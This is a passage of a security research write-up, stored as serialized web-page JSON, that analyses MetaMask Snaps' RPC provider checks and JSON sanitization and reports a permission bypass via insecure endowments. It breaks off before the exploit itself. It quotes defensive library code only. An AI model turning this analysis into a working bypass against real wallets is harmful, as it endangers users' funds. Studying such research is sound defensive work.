research",{"type":28,"tag":75,"props":37736,"children":37738},{"id":37737},"possible-attacks",[37739],{"type":33,"value":37740},"Possible attacks",{"type":28,"tag":29,"props":37742,"children":37743},{},[37744],{"type":33,"value":37745},"While searching for vulnerabilities in snap environments, we enumerated some features that can be broken, and lead to security issues, such as:",{"type":28,"tag":2108,"props":37747,"children":37748},{},[37749,37754,37759,37764],{"type":28,"tag":459,"props":37750,"children":37751},{},[37752],{"type":33,"value":37753},"Broken SES Container isolation",{"type":28,"tag":459,"props":37755,"children":37756},{},[37757],{"type":33,"value":37758},"Insecure endowments in Containers",{"type":28,"tag":459,"props":37760,"children":37761},{},[37762],{"type":33,"value":37763},"Incorrect RPC permission checks",{"type":28,"tag":459,"props":37765,"children":37766},{},[37767],{"type":33,"value":37768},"Insecure snap installation/update",{"type":28,"tag":29,"props":37770,"children":37771},{},[37772],{"type":33,"value":37773},"We went through all of these vulnerabilities assumptions, and found a minor permission bypass bug using insecure endowments.",{"type":28,"tag":29,"props":37775,"children":37776},{},[37777],{"type":33,"value":37778},"To understand the exploit, we need to dig into the snap's RPC interfaces exposed via endowments.",{"type":28,"tag":75,"props":37780,"children":37782},{"id":37781},"rpc-interfaces-endowments",[37783],{"type":33,"value":37784},"RPC interfaces endowments",{"type":28,"tag":443,"props":37786,"children":37788},{"id":37787},"providers-limitations",[37789],{"type":33,"value":37790},"Providers limitations",{"type":28,"tag":29,"props":37792,"children":37793},{},[37794,37796,37802,37803,37808,37810,37817],{"type":33,"value":37795},"A snap has two interfaces that can be used to communicate with metamask RPC interface: ",{"type":28,"tag":98,"props":37797,"children":37799},{"className":37798},[],[37800],{"type":33,"value":37801},"snap",{"type":33,"value":10659},{"type":28,"tag":98,"props":37804,"children":37806},{"className":37805},[],[37807],{"type":33,"value":31068},{"type":33,"value":37809}," (EIP-1193). These differ in that each one can only send a subset of the available RPC ",{"type":28,"tag":87,"props":37811,"children":37814},{"href":37812,"rel":37813},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/utils.ts#L130",[91],[37815],{"type":33,"value":37816},"methods",{"type":33,"value":4160},{"type":28,"tag":234,"props":37819,"children":37821},{"className":35239,"code":37820,"language":35241,"meta":7,"style":7},"export function assertSnapOutboundRequest(args: RequestArguments) {\n  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n  assert(\n    String.prototype.startsWith.call(args.method, 'wallet_') ||\n      String.prototype.startsWith.call(args.method, 'snap_'),\n    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.',\n  );\n  assert(\n    !BLOCKED_RPC_METHODS.includes(args.method),\n    ethErrors.rpc.methodNotFound({\n      data: {\n        method: args.method,\n      },\n    }),\n  );\n  assertStruct(args, JsonStruct, 'Provided value is not JSON-RPC compatible');\n}\n",[37822],{"type":28,"tag":98,"props":37823,"children":37824},{"__ignoreMap":7},[37825,37864,37872,37884,37954,38015,38027,38035,38046,38086,38116,38128,38153,38160,38168,38175,38213],{"type":28,"tag":116,"props":37826,"children":37827},{"class":245,"line":246},[37828,37833,37837,37842,37846,37851,37855,37860],{"type":28,"tag":116,"props":37829,"children":37830},{"style":260},[37831],{"type":33,"value":37832},"export",{"type":28,"tag":116,"props":37834,"children":37835},{"style":376},[37836],{"type":33,"value":1058},{"type":28,"tag":116,"props":37838,"children":37839},{"style":282},[37840],{"type":33,"value":37841}," assertSnapOutboundRequest",{"type":28,"tag":116,"props":37843,"children":37844},{"style":266},[37845],{"type":33,"value":313},{"type":28,"tag":116,"props":37847,"children":37848},{"style":272},[37849],{"type":33,"value":37850},"args",{"type":28,"tag":116,"props":37852,"children":37853},{"style":370},[37854],{"type":33,"value":4160},{"type":28,"tag":116,"props":37856,"children":37857},{"style":339},[37858],{"type":33,"value":37859}," RequestArguments",{"type":28,"tag":116,"props":37861,"children":37862},{"style":266},[37863],{"type":33,"value":844},{"type":28,"tag":116,"props":37865,"children":37866},{"class":245,"line":256},[37867],{"type":28,"tag":116,"props":37868,"children":37869},{"style":250},[37870],{"type":33,"value":37871},"  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n",{"type":28,"tag":116,"props":37873,"children":37874},{"class":245,"line":293},[37875,37880],{"type":28,"tag":116,"props":37876,"children":37877},{"style":282},[37878],{"type":33,"value":37879},"  assert",{"type":28,"tag":116,"props":37881,"children":37882},{"style":266},[37883],{"type":33,"value":3133},{"type":28,"tag":116,"props":37885,"children":37886},{"class":245,"line":361},[37887,37892,37896,37901,37905,37910,37914,37919,37923,37927,37931,37936,37940,37945,37949],{"type":28,"tag":116,"props":37888,"children":37889},{"style":339},[37890],{"type":33,"value":37891},"    String",{"type":28,"tag":116,"props":37893,"children":37894},{"style":266},[37895],{"type":33,"value":141},{"type":28,"tag":116,"props":37897,"children":37898},{"style":272},[37899],{"type":33,"value":37900},"prototype",{"type":28,"tag":116,"props":37902,"children":37903},{"style":266},[37904],{"type":33,"value":141},{"type":28,"tag":116,"props":37906,"children":37907},{"style":272},[37908],{"type":33,"value":37909},"startsWith",{"type":28,"tag":116,"props":37911,"children":37912},{"style":266},[37913],{"type":33,"value":141},{"type":28,"tag":116,"props":37915,"children":37916},{"style":282},[37917],{"type":33,"value":37918},"call",{"type":28,"tag":116,"props":37920,"children":37921},{"style":266},[37922],{"type":33,"value":313},{"type":28,"tag":116,"props":37924,"children":37925},{"style":272},[37926],{"type":33,"value":37850},{"type":28,"tag":116,"props":37928,"children":37929},{"style":266},[37930],{"type":33,"value":141},{"type":28,"tag":116,"props":37932,"children":37933},{"style":272},[37934],{"type":33,"value":37935},"method",{"type":28,"tag":116,"props":37937,"children":37938},{"style":266},[37939],{"type":33,"value":825},{"type":28,"tag":116,"props":37941,"children":37942},{"style":563},[37943],{"type":33,"value":37944},"'wallet_'",{"type":28,"tag":116,"props":37946,"children":37947},{"style":266},[37948],{"type":33,"value":1609},{"type":28,"tag":116,"props":37950,"children":37951},{"style":370},[37952],{"type":33,"value":37953},"||\n",{"type":28,"tag":116,"props":37955,"children":37956},{"class":245,"line":387},[37957,37962,37966,37970,37974,37978,37982,37986,37990,37994,37998,38002,38006,38011],{"type":28,"tag":116,"props":37958,"children":37959},{"style":339},[37960],{"type":33,"value":37961},"      String",{"type":28,"tag":116,"props":37963,"children":37964},{"style":266},[37965],{"type":33,"value":141},{"type":28,"tag":116,"props":37967,"children":37968},{"style":272},[37969],{"type":33,"value":37900},{"type":28,"tag":116,"props":37971,"children":37972},{"style":266},[37973],{"type":33,"value":141},{"type":28,"tag":116,"props":37975,"children":37976},{"style":272},[37977],{"type":33,"value":37909},{"type":28,"tag":116,"props":37979,"children":37980},{"style":266},[37981],{"type":33,"value":141},{"type":28,"tag":116,"props":37983,"children":37984},{"style":282},[37985],{"type":33,"value":37918},{"type":28,"tag":116,"props":37987,"children":37988},{"style":266},[37989],{"type":33,"value":313},{"type":28,"tag":116,"props":37991,"children":37992},{"style":272},[37993],{"type":33,"value":37850},{"type":28,"tag":116,"props":37995,"children":37996},{"style":266},[37997],{"type":33,"value":141},{"type":28,"tag":116,"props":37999,"children":38000},{"style":272},[38001],{"type":33,"value":37935},{"type":28,"tag":116,"props":38003,"children":38004},{"style":266},[38005],{"type":33,"value":825},{"type":28,"tag":116,"props":38007,"children":38008},{"style":563},[38009],{"type":33,"value":38010},"'snap_'",{"type":28,"tag":116,"props":38012,"children":38013},{"style":266},[38014],{"type":33,"value":6408},{"type":28,"tag":116,"props":38016,"children":38017},{"class":245,"line":400},[38018,38023],{"type":28,"tag":116,"props":38019,"children":38020},{"style":563},[38021],{"type":33,"value":38022},"    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.'",{"type":28,"tag":116,"props":38024,"children":38025},{"style":266},[38026],{"type":33,"value":3178},{"type":28,"tag":116,"props":38028,"children":38029},{"class":245,"line":614},[38030],{"type":28,"tag":116,"props":38031,"children":38032},{"style":266},[38033],{"type":33,"value":38034},"  );\n",{"type":28,"tag":116,"props":38036,"children":38037},{"class":245,"line":631},[38038,38042],{"type":28,"tag":116,"props":38039,"children":38040},{"style":282},[38041],{"type":33,"value":37879},{"type":28,"tag":116,"props":38043,"children":38044},{"style":266},[38045],{"type":33,"value":3133},{"type":28,"tag":116,"props":38047,"children":38048},{"class":245,"line":665},[38049,38053,38058,38062,38066,38070,38074,38078,38082],{"type":28,"tag":116,"props":38050,"children":38051},{"style":370},[38052],{"type":33,"value":20633},{"type":28,"tag":116,"props":38054,"children":38055},{"style":272},[38056],{"type":33,"value":38057},"BLOCKED_RPC_METHODS",{"type":28,"tag":116,"props":38059,"children":38060},{"style":266},[38061],{"type":33,"value":141},{"type":28,"tag":116,"props":38063,"children":38064},{"style":282},[38065],{"type":33,"value":34807},{"type":28,"tag":116,"props":38067,"children":38068},{"style":266},[38069],{"type":33,"value":313},{"type":28,"tag":116,"props":38071,"children":38072},{"style":272},[38073],{"type":33,"value":37850},{"type":28,"tag":116,"props":38075,"children":38076},{"style":266},[38077],{"type":33,"value":141},{"type":28,"tag":116,"props":38079,"children":38080},{"style":272},[38081],{"type":33,"value":37935},{"type":28,"tag":116,"props":38083,"children":38084},{"style":266},[38085],{"type":33,"value":6408},{"type":28,"tag":116,"props":38087,"children":38088},{"class":245,"line":713},[38089,38094,38098,38103,38107,38112],{"type":28,"tag":116,"props":38090,"children":38091},{"style":272},[38092],{"type":33,"value":38093},"    ethErrors",{"type":28,"tag":116,"props":38095,"children":38096},{"style":266},[38097],{"type":33,"value":141},{"type":28,"tag":116,"props":38099,"children":38100},{"style":272},[38101],{"type":33,"value":38102},"rpc",{"type":28,"tag":116,"props":38104,"children":38105},{"style":266},[38106],{"type":33,"value":141},{"type":28,"tag":116,"props":38108,"children":38109},{"style":282},[38110],{"type":33,"value":38111},"methodNotFound",{"type":28,"tag":116,"props":38113,"children":38114},{"style":266},[38115],{"type":33,"value":14803},{"type":28,"tag":116,"props":38117,"children":38118},{"class":245,"line":750},[38119,38124],{"type":28,"tag":116,"props":38120,"children":38121},{"style":272},[38122],{"type":33,"value":38123},"      data:",{"type":28,"tag":116,"props":38125,"children":38126},{"style":266},[38127],{"type":33,"value":1291},{"type":28,"tag":116,"props":38129,"children":38130},{"class":245,"line":779},[38131,38136,38141,38145,38149],{"type":28,"tag":116,"props":38132,"children":38133},{"style":272},[38134],{"type":33,"value":38135},"        method:",{"type":28,"tag":116,"props":38137,"children":38138},{"style":272},[38139],{"type":33,"value":38140}," args",{"type":28,"tag":116,"props":38142,"children":38143},{"style":266},[38144],{"type":33,"value":141},{"type":28,"tag":116,"props":38146,"children":38147},{"style":272},[38148],{"type":33,"value":37935},{"type":28,"tag":116,"props":38150,"children":38151},{"style":266},[38152],{"type":33,"value":3178},{"type":28,"tag":116,"props":38154,"children":38155},{"class":245,"line":796},[38156],{"type":28,"tag":116,"props":38157,"children":38158},{"style":266},[38159],{"type":33,"value":36823},{"type":28,"tag":116,"props":38161,"children":38162},{"class":245,"line":847},[38163],{"type":28,"tag":116,"props":38164,"children":38165},{"style":266},[38166],{"type":33,"value":38167},"    }),\n",{"type":28,"tag":116,"props":38169,"children":38170},{"class":245,"line":898},[38171],{"type":28,"tag":116,"props":38172,"children":38173},{"style":266},[38174],{"type":33,"value":38034},{"type":28,"tag":116,"props":38176,"children":38177},{"class":245,"line":907},[38178,38183,38187,38191,38195,38200,38204,38209],{"type":28,"tag":116,"props":38179,"children":38180},{"style":282},[38181],{"type":33,"value":38182},"  assertStruct",{"type":28,"tag":116,"props":38184,"children":38185},{"style":266},[38186],{"type":33,"value":313},{"type":28,"tag":116,"props":38188,"children":38189},{"style":272},[38190],{"type":33,"value":37850},{"type":28,"tag":116,"props":38192,"children":38193},{"style":266},[38194],{"type":33,"value":825},{"type":28,"tag":116,"props":38196,"children":38197},{"style":272},[38198],{"type":33,"value":38199},"JsonStruct",{"type":28,"tag":116,"props":38201,"children":38202},{"style":266},[38203],{"type":33,"value":825},{"type":28,"tag":116,"props":38205,"children":38206},{"style":563},[38207],{"type":33,"value":38208},"'Provided value is not JSON-RPC compatible'",{"type":28,"tag":116,"props":38210,"children":38211},{"style":266},[38212],{"type":33,"value":895},{"type":28,"tag":116,"props":38214,"children":38215},{"class":245,"line":981},[38216],{"type":28,"tag":116,"props":38217,"children":38218},{"style":266},[38219],{"type":33,"value":406},{"type":28,"tag":29,"props":38221,"children":38222},{},[38223,38225,38230,38232,38238,38239,38245],{"type":33,"value":38224},"This function is called by the ",{"type":28,"tag":98,"props":38226,"children":38228},{"className":38227},[],[38229],{"type":33,"value":37801},{"type":33,"value":38231}," RPC provider, so it can only send methods starting with ",{"type":28,"tag":98,"props":38233,"children":38235},{"className":38234},[],[38236],{"type":33,"value":38237},"wallet_",{"type":33,"value":12800},{"type":28,"tag":98,"props":38240,"children":38242},{"className":38241},[],[38243],{"type":33,"value":38244},"snap_",{"type":33,"value":38246},". In addition, there are some blocked RPC methods that immediately throw an error when encountered.",{"type":28,"tag":29,"props":38248,"children":38249},{},[38250,38252,38257,38259,38264,38266,38272],{"type":33,"value":38251},"On the other hand, the ",{"type":28,"tag":98,"props":38253,"children":38255},{"className":38254},[],[38256],{"type":33,"value":31068},{"type":33,"value":38258}," provider only blocks methods starting with ",{"type":28,"tag":98,"props":38260,"children":38262},{"className":38261},[],[38263],{"type":33,"value":38244},{"type":33,"value":38265}," and the blocked methods. However, it requires the ",{"type":28,"tag":98,"props":38267,"children":38269},{"className":38268},[],[38270],{"type":33,"value":38271},"endowment:ethereum-provider",{"type":33,"value":38273}," permission in the snap manifest.",{"type":28,"tag":443,"props":38275,"children":38277},{"id":38276},"execution-flow",[38278],{"type":33,"value":38279},"Execution flow",{"type":28,"tag":29,"props":38281,"children":38282},{},[38283,38285,38290,38291,38296,38298,38303,38304,38310],{"type":33,"value":38284},"Both providers (",{"type":28,"tag":98,"props":38286,"children":38288},{"className":38287},[],[38289],{"type":33,"value":37801},{"type":33,"value":10659},{"type":28,"tag":98,"props":38292,"children":38294},{"className":38293},[],[38295],{"type":33,"value":31068},{"type":33,"value":38297},") are built outside the SES container with a ",{"type":28,"tag":98,"props":38299,"children":38301},{"className":38300},[],[38302],{"type":33,"value":31144},{"type":33,"value":6129},{"type":28,"tag":87,"props":38305,"children":38308},{"href":38306,"rel":38307},"https://github.com/MetaMask/snaps/blob/main/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L437",[91],[38309],{"type":33,"value":830},{"type":33,"value":4160},{"type":28,"tag":234,"props":38312,"children":38314},{"className":35556,"code":38313,"language":35558,"meta":7,"style":7},"  const request = async (args: RequestArguments) => {\n      assertSnapOutboundRequest(args); // or assertEthereumOutboundRequest(args);\n      const sanitizedArgs = getSafeJson(args);\n      this.notify({ method: 'OutboundRequest' });\n      try {\n        return await withTeardown(\n          originalRequest(sanitizedArgs as unknown as RequestArguments),\n          this as any,\n        );\n      } finally {\n        this.notify({ method: 'OutboundResponse' });\n      }\n    };\n",[38315],{"type":28,"tag":98,"props":38316,"children":38317},{"__ignoreMap":7},[38318,38365,38390,38423,38457,38469,38489,38527,38547,38554,38571,38604,38611],{"type":28,"tag":116,"props":38319,"children":38320},{"class":245,"line":246},[38321,38325,38329,38333,38337,38341,38345,38349,38353,38357,38361],{"type":28,"tag":116,"props":38322,"children":38323},{"style":376},[38324],{"type":33,"value":35814},{"type":28,"tag":116,"props":38326,"children":38327},{"style":282},[38328],{"type":33,"value":31033},{"type":28,"tag":116,"props":38330,"children":38331},{"style":370},[38332],{"type":33,"value":2226},{"type":28,"tag":116,"props":38334,"children":38335},{"style":376},[38336],{"type":33,"value":35990},{"type":28,"tag":116,"props":38338,"children":38339},{"style":266},[38340],{"type":33,"value":269},{"type":28,"tag":116,"props":38342,"children":38343},{"style":272},[38344],{"type":33,"value":37850},{"type":28,"tag":116,"props":38346,"children":38347},{"style":370},[38348],{"type":33,"value":4160},{"type":28,"tag":116,"props":38350,"children":38351},{"style":339},[38352],{"type":33,"value":37859},{"type":28,"tag":116,"props":38354,"children":38355},{"style":266},[38356],{"type":33,"value":1609},{"type":28,"tag":116,"props":38358,"children":38359},{"style":376},[38360],{"type":33,"value":1286},{"type":28,"tag":116,"props":38362,"children":38363},{"style":266},[38364],{"type":33,"value":1291},{"type":28,"tag":116,"props":38366,"children":38367},{"class":245,"line":256},[38368,38373,38377,38381,38385],{"type":28,"tag":116,"props":38369,"children":38370},{"style":282},[38371],{"type":33,"value":38372},"      assertSnapOutboundRequest",{"type":28,"tag":116,"props":38374,"children":38375},{"style":266},[38376],{"type":33,"value":313},{"type":28,"tag":116,"props":38378,"children":38379},{"style":272},[38380],{"type":33,"value":37850},{"type":28,"tag":116,"props":38382,"children":38383},{"style":266},[38384],{"type":33,"value":28008},{"type":28,"tag":116,"props":38386,"children":38387},{"style":250},[38388],{"type":33,"value":38389},"// or assertEthereumOutboundRequest(args);\n",{"type":28,"tag":116,"props":38391,"children":38392},{"class":245,"line":293},[38393,38397,38402,38406,38411,38415,38419],{"type":28,"tag":116,"props":38394,"children":38395},{"style":376},[38396],{"type":33,"value":31196},{"type":28,"tag":116,"props":38398,"children":38399},{"style":272},[38400],{"type":33,"value":38401}," sanitizedArgs",{"type":28,"tag":116,"props":38403,"children":38404},{"style":370},[38405],{"type":33,"value":2226},{"type":28,"tag":116,"props":38407,"children":38408},{"style":282},[38409],{"type":33,"value":38410}," getSafeJson",{"type":28,"tag":116,"props":38412,"children":38413},{"style":266},[38414],{"type":33,"value":313},{"type":28,"tag":116,"props":38416,"children":38417},{"style":272},[38418],{"type":33,"value":37850},{"type":28,"tag":116,"props":38420,"children":38421},{"style":266},[38422],{"type":33,"value":895},{"type":28,"tag":116,"props":38424,"children":38425},{"class":245,"line":361},[38426,38431,38435,38440,38444,38448,38453],{"type":28,"tag":116,"props":38427,"children":38428},{"style":376},[38429],{"type":33,"value":38430},"      this",{"type":28,"tag":116,"props":38432,"children":38433},{"style":266},[38434],{"type":33,"value":141},{"type":28,"tag":116,"props":38436,"children":38437},{"style":282},[38438],{"type":33,"value":38439},"notify",{"type":28,"tag":116,"props":38441,"children":38442},{"style":266},[38443],{"type":33,"value":1119},{"type":28,"tag":116,"props":38445,"children":38446},{"style":272},[38447],{"type":33,"value":31153},{"type":28,"tag":116,"props":38449,"children":38450},{"style":563},[38451],{"type":33,"value":38452}," 'OutboundRequest'",{"type":28,"tag":116,"props":38454,"children":38455},{"style":266},[38456],{"type":33,"value":1134},{"type":28,"tag":116,"props":38458,"children":38459},{"class":245,"line":387},[38460,38465],{"type":28,"tag":116,"props":38461,"children":38462},{"style":260},[38463],{"type":33,"value":38464},"      try",{"type":28,"tag":116,"props":38466,"children":38467},{"style":266},[38468],{"type":33,"value":1291},{"type":28,"tag":116,"props":38470,"children":38471},{"class":245,"line":400},[38472,38476,38480,38485],{"type":28,"tag":116,"props":38473,"children":38474},{"style":260},[38475],{"type":33,"value":15405},{"type":28,"tag":116,"props":38477,"children":38478},{"style":260},[38479],{"type":33,"value":35837},{"type":28,"tag":116,"props":38481,"children":38482},{"style":282},[38483],{"type":33,"value":38484}," withTeardown",{"type":28,"tag":116,"props":38486,"children":38487},{"style":266},[38488],{"type":33,"value":3133},{"type":28,"tag":116,"props":38490,"children":38491},{"class":245,"line":614},[38492,38497,38501,38506,38510,38515,38519,38523],{"type":28,"tag":116,"props":38493,"children":38494},{"style":282},[38495],{"type":33,"value":38496},"          originalRequest",{"type":28,"tag":116,"props":38498,"children":38499},{"style":266},[38500],{"type":33,"value":313},{"type":28,"tag":116,"props":38502,"children":38503},{"style":272},[38504],{"type":33,"value":38505},"sanitizedArgs",{"type":28,"tag":116,"props":38507,"children":38508},{"style":260},[38509],{"type":33,"value":8500},{"type":28,"tag":116,"props":38511,"children":38512},{"style":339},[38513],{"type":33,"value":38514}," unknown",{"type":28,"tag":116,"props":38516,"children":38517},{"style":260},[38518],{"type":33,"value":8500},{"type":28,"tag":116,"props":38520,"children":38521},{"style":339},[38522],{"type":33,"value":37859},{"type":28,"tag":116,"props":38524,"children":38525},{"style":266},[38526],{"type":33,"value":6408},{"type":28,"tag":116,"props":38528,"children":38529},{"class":245,"line":631},[38530,38535,38539,38543],{"type":28,"tag":116,"props":38531,"children":38532},{"style":376},[38533],{"type":33,"value":38534},"          this",{"type":28,"tag":116,"props":38536,"children":38537},{"style":260},[38538],{"type":33,"value":8500},{"type":28,"tag":116,"props":38540,"children":38541},{"style":339},[38542],{"type":33,"value":10026},{"type":28,"tag":116,"props":38544,"children":38545},{"style":266},[38546],{"type":33,"value":3178},{"type":28,"tag":116,"props":38548,"children":38549},{"class":245,"line":665},[38550],{"type":28,"tag":116,"props":38551,"children":38552},{"style":266},[38553],{"type":33,"value":7415},{"type":28,"tag":116,"props":38555,"children":38556},{"class":245,"line":713},[38557,38562,38567],{"type":28,"tag":116,"props":38558,"children":38559},{"style":266},[38560],{"type":33,"value":38561},"      } ",{"type":28,"tag":116,"props":38563,"children":38564},{"style":260},[38565],{"type":33,"value":38566},"finally",{"type":28,"tag":116,"props":38568,"children":38569},{"style":266},[38570],{"type":33,"value":1291},{"type":28,"tag":116,"props":38572,"children":38573},{"class":245,"line":750},[38574,38579,38583,38587,38591,38595,38600],{"type":28,"tag":116,"props":38575,"children":38576},{"style":376},[38577],{"type":33,"value":38578},"        this",{"type":28,"tag":116,"props":38580,"children":38581},{"style":266},[38582],{"type":33,"value":141},{"type":28,"tag":116,"props":38584,"children":38585},{"style":282},[38586],{"type":33,"value":38439},{"type":28,"tag":116,"props":38588,"children":38589},{"style":266},[38590],{"type":33,"value":1119},{"type":28,"tag":116,"props":38592,"children":38593},{"style":272},[38594],{"type":33,"value":31153},{"type":28,"tag":116,"props":38596,"children":38597},{"style":563},[38598],{"type":33,"value":38599}," 'OutboundResponse'",{"type":28,"tag":116,"props":38601,"children":38602},{"style":266},[38603],{"type":33,"value":1134},{"type":28,"tag":116,"props":38605,"children":38606},{"class":245,"line":779},[38607],{"type":28,"tag":116,"props":38608,"children":38609},{"style":266},[38610],{"type":33,"value":2444},{"type":28,"tag":116,"props":38612,"children":38613},{"class":245,"line":796},[38614],{"type":28,"tag":116,"props":38615,"children":38616},{"style":266},[38617],{"type":33,"value":38618},"    };\n",{"type":28,"tag":29,"props":38620,"children":38621},{},[38622,38624,38629,38631,38636],{"type":33,"value":38623},"In particular, this function is from the ",{"type":28,"tag":98,"props":38625,"children":38627},{"className":38626},[],[38628],{"type":33,"value":37801},{"type":33,"value":38630}," provider, but the only thing that changes between this and ",{"type":28,"tag":98,"props":38632,"children":38634},{"className":38633},[],[38635],{"type":33,"value":31068},{"type":33,"value":38637}," is the assert function in the first line.",{"type":28,"tag":29,"props":38639,"children":38640},{},[38641],{"type":33,"value":38642},"As we can see in the code, the execution flow follows this pattern:",{"type":28,"tag":455,"props":38644,"children":38645},{},[38646,38658,38663],{"type":28,"tag":459,"props":38647,"children":38648},{},[38649,38651,38656],{"type":33,"value":38650},"Assert if ",{"type":28,"tag":98,"props":38652,"children":38654},{"className":38653},[],[38655],{"type":33,"value":37850},{"type":33,"value":38657}," are valid",{"type":28,"tag":459,"props":38659,"children":38660},{},[38661],{"type":33,"value":38662},"getSafeJson to get sanitizedArgs",{"type":28,"tag":459,"props":38664,"children":38665},{},[38666],{"type":33,"value":38667},"originalRequest(sanitizedArgs)",{"type":28,"tag":29,"props":38669,"children":38670},{},[38671,38673,38679],{"type":33,"value":38672},"Obs: ",{"type":28,"tag":98,"props":38674,"children":38676},{"className":38675},[],[38677],{"type":33,"value":38678},"originalRequest",{"type":33,"value":38680}," makes the RPC call to metamask service worker",{"type":28,"tag":75,"props":38682,"children":38684},{"id":38683},"safe-json-exploit",[38685],{"type":33,"value":38686},"Safe JSON Exploit",{"type":28,"tag":29,"props":38688,"children":38689},{},[38690,38692,38698,38700,38705,38707,38713],{"type":33,"value":38691},"As we dug further into the",{"type":28,"tag":98,"props":38693,"children":38695},{"className":38694},[],[38696],{"type":33,"value":38697},"getSafeJson",{"type":33,"value":38699}," function (defined in ",{"type":28,"tag":98,"props":38701,"children":38703},{"className":38702},[],[38704],{"type":33,"value":36920},{"type":33,"value":38706}," package) we discovered the following ",{"type":28,"tag":87,"props":38708,"children":38711},{"href":38709,"rel":38710},"https://github.com/MetaMask/utils/blob/7f0116d4d853d85319d200c503a2f9abc390f1d3/src/json.ts#L72",[91],[38712],{"type":33,"value":98},{"type":33,"value":4160},{"type":28,"tag":234,"props":38715,"children":38717},{"className":35239,"code":38716,"language":35241,"meta":7,"style":7},"export const JsonStruct = coerce(UnsafeJsonStruct, any(), (value) => {\n  assertStruct(value, UnsafeJsonStruct);\n  return JSON.parse(\n    JSON.stringify(value, (propKey, propValue) => {\n      // Strip __proto__ and constructor properties to prevent prototype pollution.\n      if (propKey === '__proto__' || propKey === 'constructor') {\n        return undefined;\n      }\n      return propValue;\n    }),\n  );\n});\n",[38718],{"type":28,"tag":98,"props":38719,"children":38720},{"__ignoreMap":7},[38721,38786,38813,38838,38893,38901,38947,38963,38970,38987,38994,39001],{"type":28,"tag":116,"props":38722,"children":38723},{"class":245,"line":246},[38724,38728,38733,38738,38742,38747,38751,38756,38760,38764,38769,38774,38778,38782],{"type":28,"tag":116,"props":38725,"children":38726},{"style":260},[38727],{"type":33,"value":37832},{"type":28,"tag":116,"props":38729,"children":38730},{"style":376},[38731],{"type":33,"value":38732}," const",{"type":28,"tag":116,"props":38734,"children":38735},{"style":272},[38736],{"type":33,"value":38737}," JsonStruct",{"type":28,"tag":116,"props":38739,"children":38740},{"style":370},[38741],{"type":33,"value":2226},{"type":28,"tag":116,"props":38743,"children":38744},{"style":282},[38745],{"type":33,"value":38746}," coerce",{"type":28,"tag":116,"props":38748,"children":38749},{"style":266},[38750],{"type":33,"value":313},{"type":28,"tag":116,"props":38752,"children":38753},{"style":272},[38754],{"type":33,"value":38755},"UnsafeJsonStruct",{"type":28,"tag":116,"props":38757,"children":38758},{"style":266},[38759],{"type":33,"value":825},{"type":28,"tag":116,"props":38761,"children":38762},{"style":282},[38763],{"type":33,"value":16375},{"type":28,"tag":116,"props":38765,"children":38766},{"style":266},[38767],{"type":33,"value":38768},"(), (",{"type":28,"tag":116,"props":38770,"children":38771},{"style":272},[38772],{"type":33,"value":38773},"value",{"type":28,"tag":116,"props":38775,"children":38776},{"style":266},[38777],{"type":33,"value":1609},{"type":28,"tag":116,"props":38779,"children":38780},{"style":376},[38781],{"type":33,"value":1286},{"type":28,"tag":116,"props":38783,"children":38784},{"style":266},[38785],{"type":33,"value":1291},{"type":28,"tag":116,"props":38787,"children":38788},{"class":245,"line":256},[38789,38793,38797,38801,38805,38809],{"type":28,"tag":116,"props":38790,"children":38791},{"style":282},[38792],{"type":33,"value":38182},{"type":28,"tag":116,"props":38794,"children":38795},{"style":266},[38796],{"type":33,"value":313},{"type":28,"tag":116,"props":38798,"children":38799},{"style":272},[38800],{"type":33,"value":38773},{"type":28,"tag":116,"props":38802,"children":38803},{"style":266},[38804],{"type":33,"value":825},{"type":28,"tag":116,"props":38806,"children":38807},{"style":272},[38808],{"type":33,"value":38755},{"type":28,"tag":116,"props":38810,"children":38811},{"style":266},[38812],{"type":33,"value":895},{"type":28,"tag":116,"props":38814,"children":38815},{"class":245,"line":293},[38816,38821,38825,38829,38834],{"type":28,"tag":116,"props":38817,"children":38818},{"style":260},[38819],{"type":33,"value":38820},"  return",{"type":28,"tag":116,"props":38822,"children":38823},{"style":272},[38824],{"type":33,"value":37151},{"type":28,"tag":116,"props":38826,"children":38827},{"style":266},[38828],{"type":33,"value":141},{"type":28,"tag":116,"props":38830,"children":38831},{"style":282},[38832],{"type":33,"value":38833},"parse",{"type":28,"tag":116,"props":38835,"children":38836},{"style":266},[38837],{"type":33,"value":3133},{"type":28,"tag":116,"props":38839,"children":38840},{"class":245,"line":361},[38841,38846,38850,38855,38859,38863,38867,38872,38876,38881,38885,38889],{"type":28,"tag":116,"props":38842,"children":38843},{"style":272},[38844],{"type":33,"value":38845},"    JSON",{"type":28,"tag":116,"props":38847,"children":38848},{"style":266},[38849],{"type":33,"value":141},{"type":28,"tag":116,"props":38851,"children":38852},{"style":282},[38853],{"type":33,"value":38854},"stringify",{"type":28,"tag":116,"props":38856,"children":38857},{"style":266},[38858],{"type":33,"value":313},{"type":28,"tag":116,"props":38860,"children":38861},{"style":272},[38862],{"type":33,"value":38773},{"type":28,"tag":116,"props":38864,"children":38865},{"style":266},[38866],{"type":33,"value":8491},{"type":28,"tag":116,"props":38868,"children":38869},{"style":272},[38870],{"type":33,"value":38871},"propKey",{"type":28,"tag":116,"props":38873,"children":38874},{"style":266},[38875],{"type":33,"value":825},{"type":28,"tag":116,"props":38877,"children":38878},{"style":272},[38879],{"type":33,"value":38880},"propValue",{"type":28,"tag":116,"props":38882,"children":38883},{"style":266},[38884],{"type":33,"value":1609},{"type":28,"tag":116,"props":38886,"children":38887},{"style":376},[38888],{"type":33,"value":1286},{"type":28,"tag":116,"props":38890,"children":38891},{"style":266},[38892],{"type":33,"value":1291},{"type":28,"tag":116,"props":38894,"children":38895},{"class":245,"line":387},[38896],{"type":28,"tag":116,"props":38897,"children":38898},{"style":250},[38899],{"type":33,"value":38900},"      // Strip __proto__ and constructor properties to prevent prototype 